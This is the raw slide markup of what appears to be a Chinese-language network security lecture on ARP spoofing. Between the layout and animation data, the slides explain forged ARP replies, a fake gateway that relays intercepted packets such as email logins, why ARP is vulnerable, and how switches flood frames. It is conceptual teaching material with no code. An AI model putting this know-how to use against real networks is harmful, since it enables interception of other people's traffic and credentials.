              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>邮箱登录数据包）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217132" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2123803" y="2421657"/>
            <a:ext cx="1295400" cy="129540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3" name="Rectangle 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="626444" y="5654795"/>
            <a:ext cx="6699942" cy="59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itchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>网关再把数据包转发给真正的网关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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7123"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2171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124"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2171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712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71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7127"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2171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217127"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2171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17130"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21713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7125"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2171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171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171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17131"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21713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1713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17132"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21713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7133"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="217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24" grpId="0"/>
      <p:bldP spid="217124" grpId="1"/>
      <p:bldP spid="217125" grpId="0"/>
      <p:bldP spid="217125" grpId="1"/>
      <p:bldP spid="217131" grpId="0"/>
      <p:bldP spid="217131" grpId="1"/>
      <p:bldP spid="217133"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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512763" y="1428750"/>
            <a:ext cx="8250237" cy="4743450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击者伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP Reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>报文假冒其它主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>如主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>B Reply&lt;MACb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IPc&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，此时所有发送到主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的包都被发送到了主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238594" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" smtClean="0"/>
              <a:t>欺骗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" smtClean="0"/>
              <a:t>假冒攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65539" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3CDE8C57-AED4-44F8-BA1C-F836391477DD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="322562" name="Picture 2" descr="http://f.hiphotos.baidu.com/baike/pic/item/d833c895d143ad4b048964cf82025aafa40f061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5676" y="2877010"/>
            <a:ext cx="6264696" cy="3990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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>设计之类没有考虑安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>任何计算机都可以发送虚假的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>无状态性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>reply</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>之间没有关系</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主机无论是否发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>请求，都会在收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>响应时刷新自己</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓存</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>缓存定时更新，给攻击者以可乘之机。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73730" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗问题的原因：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24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32"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p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>只能被用于局域网（黑客必须已经获得局域网中某台机器的访问权）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74754" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>局限性</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="221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D46D7FB5-B347-4C2B-8563-50C7AE843E0B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="898989"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络接口层协议及安全威胁</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="2349500"/>
            <a:ext cx="7273925" cy="893763"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6181886"/>
              <a:gd name="T1" fmla="*/ 23472 h 1036915"/>
              <a:gd name="T2" fmla="*/ 30361 w 6181886"/>
              <a:gd name="T3" fmla="*/ 6875 h 1036915"/>
              <a:gd name="T4" fmla="*/ 103662 w 6181886"/>
              <a:gd name="T5" fmla="*/ 0 h 1036915"/>
              <a:gd name="T6" fmla="*/ 6076628 w 6181886"/>
              <a:gd name="T7" fmla="*/ 0 h 1036915"/>
              <a:gd name="T8" fmla="*/ 6149914 w 6181886"/>
              <a:gd name="T9" fmla="*/ 6875 h 1036915"/>
              <a:gd name="T10" fmla="*/ 6180281 w 6181886"/>
              <a:gd name="T11" fmla="*/ 23472 h 1036915"/>
              <a:gd name="T12" fmla="*/ 6180281 w 6181886"/>
              <a:gd name="T13" fmla="*/ 211241 h 1036915"/>
              <a:gd name="T14" fmla="*/ 6149914 w 6181886"/>
              <a:gd name="T15" fmla="*/ 227838 h 1036915"/>
              <a:gd name="T16" fmla="*/ 6076628 w 6181886"/>
              <a:gd name="T17" fmla="*/ 234712 h 1036915"/>
              <a:gd name="T18" fmla="*/ 103662 w 6181886"/>
              <a:gd name="T19" fmla="*/ 234712 h 1036915"/>
              <a:gd name="T20" fmla="*/ 30361 w 6181886"/>
              <a:gd name="T21" fmla="*/ 227838 h 1036915"/>
              <a:gd name="T22" fmla="*/ 0 w 6181886"/>
              <a:gd name="T23" fmla="*/ 211241 h 1036915"/>
              <a:gd name="T24" fmla="*/ 0 w 6181886"/>
              <a:gd name="T25" fmla="*/ 23472 h 10369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81886"/>
              <a:gd name="T40" fmla="*/ 0 h 1036915"/>
              <a:gd name="T41" fmla="*/ 6181886 w 6181886"/>
              <a:gd name="T42" fmla="*/ 1036915 h 10369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81886" h="1036915">
                <a:moveTo>
                  <a:pt x="0" y="103692"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="76191"/>
                  <a:pt x="10925" y="49817"/>
                  <a:pt x="30371" y="30371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49817" y="10925"/>
                  <a:pt x="76192" y="0"/>
                  <a:pt x="103692" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6078194" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6105695" y="0"/>
                  <a:pt x="6132069" y="10925"/>
                  <a:pt x="6151515" y="30371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6170961" y="49817"/>
                  <a:pt x="6181886" y="76192"/>
                  <a:pt x="6181886" y="103692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6181886" y="933223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6181886" y="960724"/>
                  <a:pt x="6170961" y="987098"/>
                  <a:pt x="6151515" y="1006544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6132069" y="1025990"/>
                  <a:pt x="6105694" y="1036915"/>
                  <a:pt x="6078194" y="1036915"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="103692" y="1036915"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76191" y="1036915"/>
                  <a:pt x="49817" y="1025990"/>
                  <a:pt x="30371" y="1006544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10925" y="987098"/>
                  <a:pt x="0" y="960723"/>
                  <a:pt x="0" y="933223"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="103692"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="63500" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="106570" tIns="106570" rIns="1117562" bIns="106570"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z="2800">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>根据交换表来决定把到达的帧发送到哪个端口，而不是广播接收到的帧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1042988" y="3788693"/>
            <a:ext cx="7345363" cy="2160587"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 6181886"/>
              <a:gd name="T1" fmla="*/ 11320271 h 1036915"/>
              <a:gd name="T2" fmla="*/ 32447 w 6181886"/>
              <a:gd name="T3" fmla="*/ 3315649 h 1036915"/>
              <a:gd name="T4" fmla="*/ 110780 w 6181886"/>
              <a:gd name="T5" fmla="*/ 0 h 1036915"/>
              <a:gd name="T6" fmla="*/ 6493773 w 6181886"/>
              <a:gd name="T7" fmla="*/ 0 h 1036915"/>
              <a:gd name="T8" fmla="*/ 6572096 w 6181886"/>
              <a:gd name="T9" fmla="*/ 3315649 h 1036915"/>
              <a:gd name="T10" fmla="*/ 6604550 w 6181886"/>
              <a:gd name="T11" fmla="*/ 11320271 h 1036915"/>
              <a:gd name="T12" fmla="*/ 6604550 w 6181886"/>
              <a:gd name="T13" fmla="*/ 101881579 h 1036915"/>
              <a:gd name="T14" fmla="*/ 6572096 w 6181886"/>
              <a:gd name="T15" fmla="*/ 109886088 h 1036915"/>
              <a:gd name="T16" fmla="*/ 6493773 w 6181886"/>
              <a:gd name="T17" fmla="*/ 113201738 h 1036915"/>
              <a:gd name="T18" fmla="*/ 110780 w 6181886"/>
              <a:gd name="T19" fmla="*/ 113201738 h 1036915"/>
              <a:gd name="T20" fmla="*/ 32447 w 6181886"/>
              <a:gd name="T21" fmla="*/ 109886088 h 1036915"/>
              <a:gd name="T22" fmla="*/ 0 w 6181886"/>
              <a:gd name="T23" fmla="*/ 101881579 h 1036915"/>
              <a:gd name="T24" fmla="*/ 0 w 6181886"/>
              <a:gd name="T25" fmla="*/ 11320271 h 10369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81886"/>
              <a:gd name="T40" fmla="*/ 0 h 1036915"/>
              <a:gd name="T41" fmla="*/ 6181886 w 6181886"/>
              <a:gd name="T42" fmla="*/ 1036915 h 10369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81886" h="1036915">
                <a:moveTo>
                  <a:pt x="0" y="103692"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="76191"/>
                  <a:pt x="10925" y="49817"/>
                  <a:pt x="30371" y="30371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49817" y="10925"/>
                  <a:pt x="76192" y="0"/>
                  <a:pt x="103692" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6078194" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6105695" y="0"/>
                  <a:pt x="6132069" y="10925"/>
                  <a:pt x="6151515" y="30371"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6170961" y="49817"/>
                  <a:pt x="6181886" y="76192"/>
                  <a:pt x="6181886" y="103692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6181886" y="933223"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6181886" y="960724"/>
                  <a:pt x="6170961" y="987098"/>
                  <a:pt x="6151515" y="1006544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6132069" y="1025990"/>
                  <a:pt x="6105694" y="1036915"/>
                  <a:pt x="6078194" y="1036915"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="103692" y="1036915"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="76191" y="1036915"/>
                  <a:pt x="49817" y="1025990"/>
                  <a:pt x="30371" y="1006544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10925" y="987098"/>
                  <a:pt x="0" y="960723"/>
                  <a:pt x="0" y="933223"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="103692"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="94D4EE"/>
              </a:gs>
              <a:gs pos="64999">
                <a:srgbClr val="C6ECFD"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D6F4FF"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="72280" tIns="72280" rIns="360000" bIns="360000"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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>以下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>两种情况，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>交换机会采用广播方式发送数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
